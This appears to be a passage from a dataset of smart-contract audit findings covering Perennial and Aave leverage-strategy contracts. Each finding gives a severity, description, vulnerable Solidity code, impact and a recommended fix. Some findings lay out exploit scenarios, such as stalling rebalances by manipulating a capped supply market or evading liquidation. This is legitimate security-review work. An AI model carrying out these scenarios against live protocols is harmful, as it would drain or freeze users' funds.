maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n\\n`fee=min(totalCollateral,collateralForFee*liquidationFee)` But the PROBLEM is, the value of `totalCollateral` is fetched before calling `product.closeAll`, and `product.closeAll` debits the closePosition fee from the collateral balance. So there is an attempt to debit `totalCollateral`, when the current collateral balance of the account is totalCollateral-closePositionFees This allows the following:\\nThere is an ETH-long market with following configs:\\nmaintenance=5%\\nminCollateral=100USDC\\nliquidationFee=20%\\nETH price=$1000\\nUser uses 500USDC to open $10000(10ETH) position\\nPrice of ETH spikes up to $6000\\nRequired maintenance= 60000*5%=$3000 which is higher than account's collateral balance(500USDC), therefore account should be liquidated\\nA watcher attempts to liquidate the account which does the following:\\ntotalCollateral=500USDC\\n`product.closeAll` closes the position and debits a makerFee of 10USDC\\ncurrent collateral balance=490USDC\\ncollateralForFee=totalMaintenance=$3000\\nfee=min(500,3000*20%)=500\\n`_products[product].debitAccount(account,fee)` attempts to subtract 500 from 490 which would revert due to underflow\\naccount does not get liquidated\\nNow, User is not liquidated even when he is using 500USD to control a $60000 position at 120x leverage(whereas, maxLeverage=20x)\\nNOTE: This would happen when the market token's price increases by (1/liquidationFee)x. In the above example, price of ETH increased by 6x (from 1000USD to 6000USD) which is greater than 5(1/20%)ч`totalCollateral` that would be paid to liquidator should be refetched after `product.closeAll` is called to get the current collateral balance after closePositionFees have been debited.чA User's position will not be liquidated even when his collateral balance falls WELL below the required maintenance. I believe this is of HIGH impact because this scenario is very likely to happen, and when it does, the protocol will be greatly affected because a lot of users will be trading abnormally high leveraged positions without getting liquidated.ч```\\nfunction liquidate(\\n address account,\\n IProduct product\\n ) external nonReentrant notPaused isProduct(product) settleForAccount(account, product) {\\n if (product.isLiquidating(account)) revert CollateralAccountLiquidatingError(account);\\n\\n UFixed18 totalMaintenance = product.maintenance(account); maintenance?\\n UFixed18 totalCollateral = collateral(account, product); \\n\\n if (!totalMaintenance.gt(totalCollateral))\\n revert CollateralCantLiquidate(totalMaintenance, totalCollateral);\\n\\n product.closeAll(account);\\n\\n // claim fee\\n UFixed18 liquidationFee = controller().liquidationFee();\\n \\n UFixed18 collateralForFee = UFixed18Lib.max(totalMaintenance, controller().minCollateral()); \\n UFixed18 fee = UFixed18Lib.min(totalCollateral, collateralForFee.mul(liquidationFee)); \\n\\n _products[product].debitAccount(account, fee); \\n token.push(msg.sender, fee);\\n\\n emit Liquidation(account, product, msg.sender, fee);\\n }\\n```\\n -`BalancedVault` doesn't consider potential break in one of the marketsчmediumчIn case of critical failure of any of the underlying markets, making it permanently impossible to close position and withdraw collateral all funds deposited to balanced Vault will be lost, including funds deposited to other markets.\\nAs Markets and Vaults on Perennial are intented to be created in a permissionless manner and integrate with external price feeds, it cannot be ruled out that any Market will enter a state of catastrophic failure at a point in the future (i.e. oracle used stops functioning and Market admin keys are compromised, so it cannot be changed), resulting in permanent inability to process closing positions and withdrawing collateral.\\n`BalancedVault` does not consider this case, exposing all funds deposited to a multi-market Vault to an increased risk, as it is not implementing a possibility for users to withdraw deposited funds through a partial emergency withdrawal from other markets, even at a price of losing the claim to locked funds in case it becomes available in the future. This risk is not mentioned in the documentation.\\nProof of Concept\\nConsider a Vault with 2 markets: ETH/USD and ARB/USD.\\nAlice deposits to Vault, her funds are split between 2 markets\\nARB/USD market undergoes a fatal failure resulting in `maxAmount` returned from `_maxRedeemAtEpoch` to be 0\\nAlice cannot start withdrawal process as this line in `redeem` reverts:\\n```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\nчImplement a partial/emergency withdrawal or acknowledge the risk clearly in Vault's documentation.чUsers funds are exposed to increased risk compared to depositing to each market individually and in case of failure of any of the markets all funds are lost. User has no possibility to consciously cut losses and withdraw funds from Markets other than the failed one.ч```\\n if (shares.gt(_maxRedeemAtEpoch(context, accountContext, account))) revert BalancedVaultRedemptionLimitExceeded();\\n```\\n -eMode implementation is completely brokenчhighчEnabling eMode allows assets of the same class to be borrowed at much higher a much higher LTV. The issue is that the current implementation makes the incorrect calls to the Aave V3 pool making so that the pool can never take advantage of this higher LTV.\\nAaveLeverageStrategyExtension.sol#L1095-L1109\\n```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n\\nWhen calculating the max borrow/repay allowed, the contract uses the getReserveConfigurationData subcall to the pool.\\nAaveProtocolDataProvider.sol#L77-L100\\n```\\nfunction getReserveConfigurationData(\\n address asset\\n)\\n external\\n view\\n override\\n returns (\\n // rest of code\\n )\\n{\\n DataTypes.ReserveConfigurationMap memory configuration = IPool(ADDRESSES_PROVIDER.getPool())\\n .getConfiguration(asset);\\n\\n (ltv, liquidationThreshold, liquidationBonus, decimals, reserveFactor, ) = configuration\\n .getParams();\\n```\\n\\nThe issue with using getReserveConfigurationData is that it always returns the default settings of the pool. It never returns the adjusted eMode settings. This means that no matter the eMode status of the set token, it will never be able to borrow to that limit due to calling the incorrect function.\\nIt is also worth considering that the set token as well as other integrated modules configurations/settings would assume this higher LTV. Due to this mismatch, the set token would almost guaranteed be misconfigured which would lead to highly dangerous/erratic behavior from both the set and it's integrated modules. Due to this I believe that a high severity is appropriate.чPull the adjusted eMode settings rather than the base pool settingsчUsage of eMode, a core function of the contracts, is completely unusable causing erratic/dangerous behaviorч```\\nfunction _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n \\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n```\\n -_calculateMaxBorrowCollateral calculates repay incorrectly and can lead to set token liquidationчhighчWhen calculating the amount to repay, `_calculateMaxBorrowCollateral` incorrectly applies `unutilizedLeveragePercentage` when calculating `netRepayLimit`. The result is that if the `borrowValue` ever exceeds `liquidationThreshold * (1 - unutilizedLeveragPercentage)` then all attempts to repay will revert.\\nAaveLeverageStrategyExtension.sol#L1110-L1118\\n```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n\\nWhen calculating `netRepayLimit`, `_calculateMaxBorrowCollateral` uses the `liquidationThreshold` adjusted by `unutilizedLeveragePercentage`. It then subtracts the borrow value from this limit. This is problematic because if the current `borrowValue` of the set token exceeds `liquidationThreshold` * (1 - unutilizedLeveragPercentage) then this line will revert making it impossible to make any kind of repayment. Once no repayment is possible the set token can't rebalance and will be liquidated.чDon't adjust the max value by `unutilizedLeveragPercentage`чOnce the leverage exceeds a certain point the set token can no longer rebalanceч```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n -setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at AaveчmediumчsetIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave\\nrebalance implement a cap of tradeSize and if the need to rebalance require taking more assets than the maxTradeSize, then `twapLeverageRatio` would be set to the targeted leverage. `twapLeverageRatio` == 0 is required during rebalance.\\nConsider:\\nlever is needed during rebalance, the strategy require to borrow more ETH and sell to wstETH during the 1st call of rebalance the protocol cache the new `twapLeverageRatio` However wstETH market in Aave reach supply cap. rebalance/iterateRebalance comes to a halt. `twapLeverageRatio` remains caching the targeted leverage\\nsetIncentiveSettings requires a condition in which no rebalance is in progress. With the above case, setIncentiveSettings can be halted for an extended period of time until the wstETH market falls under supply cap.\\nWorth-noting, at the time of writing this issue, the wstETH market at Aave has been at supply cap\\nIn this case, malicious actor who already has a position in wstETH can do the following:\\ndeposit into the setToken, trigger a rebalance.\\nmalicious trader withdraw his/her position in Aave wstETH market so there opens up vacancy for supply again.\\nprotocol owner see supply vacancy, call rebalance in order to lever as required. Now twapLeverageRatio is set to new value since multiple trades are needed\\nmalicious trader now re-supply the wstETH market at Aave so it reaches supply cap again.\\nthe protocol gets stuck with a non-zero twapLeverageRatio, `setIncentiveSettings` can not be called.\\n```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\nчAdd some checks on whether the supply cap of an Aave market is reached during a rebalance. If so, allows a re-set of twapLeverageRatioчsetIncentiveSettings would be halt.ч```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\n -Protocol doesn't completely protect itself from `LTV = 0` tokensчmediumчThe AaveLeverageStrategyExtension does not completely protect against tokens with a Loan-to-Value (LTV) of 0. Tokens with an LTV of 0 in Aave V3 pose significant risks, as they cannot be used as collateral to borrow upon a breaking withdraw. Moreover, LTVs of assets could be set to 0, even though they currently aren't, it could create substantial problems with potential disruption of multiple functionalities. This bug could cause a Denial-of-Service (DoS) situation in some cases, and has a potential to impact the borrowing logic in the protocol, leading to an unintentionally large perceived borrowing limit.\\nWhen an AToken has LTV = 0, Aave restricts the usage of certain operations. Specifically, if a user owns at least one AToken as collateral with an LTV = 0, certain operations could revert:\\nWithdraw: If the asset being withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.\\nTransfer: If the asset being transferred is an AToken with LTV > 0 and the sender is using the asset as collateral and is borrowing something, the operation will revert.\\nSet the reserve of an AToken as non-collateral: If the AToken being set as non-collateral is an AToken with LTV > 0, the operation will revert.\\nTake a look at AaveLeverageStrategyExtension.sol#L1050-L1119\\n```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n\\nApart from the aforementioned issue with `LTV = 0` tokens, there's another issue with the `_calculateMaxBorrowCollateral()` function. When `LTV = 0`, `maxLtvRaw` also equals 0, leading to a `netBorrowLimit` of 0. When the borrowing value is subtracted from this, it results in an underflow, causing the borrowing limit to appear incredibly large. This essentially breaks the borrowing logic of the protocol.чThe protocol should consider implementing additional protections against tokens with an LTV of 0.чThis bug could potentially disrupt the entire borrowing logic within the protocol by inflating the perceived borrowing limit. This could lead to users borrowing an unlimited amount of assets due to the underflow error. In extreme cases, this could lead to a potential loss of user funds or even a complete protocol shutdown, thus impacting user trust and the overall functionality of the protocol.ч```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n -no validation to ensure the arbitrum sequencer is downчmediumчThere is no validation to ensure sequencer is down\\n```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n\\nUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.чrecommend to add checks to ensure the sequencer is not down.чwhen sequencer is down, stale price is used for oracle and the borrow value and collateral value is calculated and the protocol can be forced to rebalance in a loss positionч```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n -Relying solely on oracle base slippage parameters can cause significant loss due to sandwich attacksчmediumчAaveLeverageStrategyExtension relies solely on oracle price data when determining the slippage parameter during a rebalance. This is problematic as chainlink oracles, especially mainnet, have upwards of 2% threshold before triggering a price update. If swapping between volatile assets, the errors will compound causing even bigger variation. These variations can be exploited via sandwich attacks.\\nAaveLeverageStrategyExtension.sol#L1147-L1152\\n```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n\\nWhen determining the minimum return from the swap, _calculateMinRepayUnits directly uses oracle data to determine the final output. The differences between the true value and the oracle value can be systematically exploited via sandwich attacks. Given the leverage nature of the module, these losses can cause significant loss to the pool.чThe solution to this is straight forward. Allow keepers to specify their own slippage value. Instead of using an oracle slippage parameter, validate that the specified slippage value is within a margin of the oracle. This gives the best of both world. It allows for tighter and more reactive slippage controls while still preventing outright abuse in the event that the trusted keeper is compromised.чPurely oracle derived slippage parameters will lead to significant and unnecessary lossesч```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n -Chainlink price feed is `deprecated`, not sufficiently validated and can return `stale` prices.чmediumчThe function `_createActionInfo()` uses Chainlink's deprecated latestAnswer function, this function also does not guarantee that the price returned by the Chainlink price feed is not stale and there is no additional checks to ensure that the return values are valid.\\nThe internal function `_createActionInfo()` uses calls `strategy.collateralPriceOracle.latestAnswer()` and `strategy.borrowPriceOracle.latestAnswer()` that uses Chainlink's deprecated latestAnswer() to get the latest price. However, there is no check for if the return value is a stale data.\\n```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\nчThe `latestRoundData` function should be used instead of the deprecated `latestAnswer` function and add sufficient checks to ensure that the pricefeed is not stale.\\n```\\n(uint80 roundId, int256 assetChainlinkPriceInt, , uint256 updatedAt, uint80 answeredInRound) = IPrice(_chainlinkFeed).latestRoundData();\\n require(answeredInRound >= roundId, \"price is stale\");\\n require(updatedAt > 0, \"round is incomplete\");\\n```\\nчThe function `_createActionInfo()` is used to return important values used throughout the contract, the staleness of the chainlinklink return values will lead to wrong calculation of the collateral and borrow prices and other unexpected behavior.ч```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n -The protocol does not compatible with token such as USDT because of the Approval Face ProtectionчmediumчThe protocol does not compatible with token such as USDT because of the Approval Face Protection\\nthe protocol is intended to interact with any ERC20 token and USDT is a common one\\nQ: Which ERC20 tokens do you expect will interact with the smart contracts? The protocol expects to interact with any ERC20.\\nIndividual SetToken's should only interact with ERC20 chosen by the SetToken manager.\\nwhen doing the deleverage\\nfirst, we construct the deleverInfo\\n```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n\\nthen we withdraw from the lending pool, execute trade and repay the borrow token\\n```\\n_withdraw(deleverInfo.setToken, deleverInfo.lendingPool, _collateralAsset, deleverInfo.notionalSendQuantity);\\n\\n uint256 postTradeReceiveQuantity = _executeTrade(deleverInfo, _collateralAsset, _repayAsset, _tradeData);\\n\\n uint256 protocolFee = _accrueProtocolFee(_setToken, _repayAsset, postTradeReceiveQuantity);\\n\\n uint256 repayQuantity = postTradeReceiveQuantity.sub(protocolFee);\\n\\n _repayBorrow(deleverInfo.setToken, deleverInfo.lendingPool, _repayAsset, repayQuantity);\\n```\\n\\nthis is calling _repayBorrow\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe trade received (quantity - the protocol fee) is used to repay the debt\\nbut the required debt to be required is the (borrowed amount + the interest rate)\\nsuppose the only debt that needs to be repayed is 1000 USDT\\ntrade received (quantity - the protocol) fee is 20000 USDT\\nonly 1000 USDT is used to repay the debt\\nbecause when repaying, the paybackAmount is only the debt amount\\n```\\nuint256 paybackAmount = params.interestRateMode == DataTypes.InterestRateMode.STABLE\\n ? stableDebt\\n : variableDebt;\\n```\\n\\nthen when burning the variable debt token\\n```\\nreserveCache.nextScaledVariableDebt = IVariableDebtToken(\\n reserveCache.variableDebtTokenAddress\\n ).burn(params.onBehalfOf, paybackAmount, reserveCache.nextVariableBorrowIndex);\\n```\\n\\nonly the \"payback amount\", which is 1000 USDT is transferred to pay the debt,\\nthe excessive leftover amount is (20000 USDT - 1000 USDT) = 19000 USDT\\nbut if we lookback into the repayBack function\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe approved amount is 20000 USDT, but only 1000 USDT approval limit is used, we have 19000 USDT approval limit left\\naccording to\\nSome tokens (e.g. OpenZeppelin) will revert if trying to approve the zero address to spend tokens (i.e. a call to approve(address(0), amt)).\\nIntegrators may need to add special cases to handle this logic if working with such a token.\\nUSDT is such token that subject to approval race condition, without approving 0 first, the second approve after first repay will revertчApproval 0 firstчsecond and following repay borrow will revert if the ERC20 token is subject to approval race conditionч```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n -Operator is blocked when sequencer is down on ArbitrumчmediumчWhen the sequencer is down on Arbitrum state changes can still happen on L2 by passing them from L1 through the Delayed Inbox.\\nUsers can still interact with the Index protocol but due to how Arbitrum address aliasing functions the operator will be blocked from calling onlyOperator().\\nThe `msg.sender` of a transaction from the Delayed Inbox is aliased:\\n```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n\\nAll functions with the `onlyOperator()` modifier are therefore blocked when the sequencer is down.\\nThe issue exists for all modifiers that are only callable by specific EOAs. But the operator of the Aave3LeverageStrategyExtension is the main security risk.чChange the `onlyOperator()` to check if the address is the aliased address of the operator.чThe operator has roles that are vital for the safety of the protocol. Re-balancing and issuing/redeeming can still be done when the sequencer is down it is therefore important that the operator call the necessary functions to operate the protocol when the sequencer is down.\\n`disengage()` is an important safety function that the operator should always have access especially when the protocol is still in accessible to other users. Changing methodology and adding/removing exchanges are also important for the safety of the protocol.ч```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n -Oracle Price miss matched when E-mode uses single oracleчmediumчAAVE3 can turn on single oracle use on any E-mode category. When that is done collateral and the borrowed assets will be valued based on a single oracle price. When this is done the prices used in AaveLeverageStrategyExtension can differ from those used internally in AAVE3.\\nThis can lead to an increased risk of liquidation and failures to re-balance properly.\\nThere is currently no accounting for single 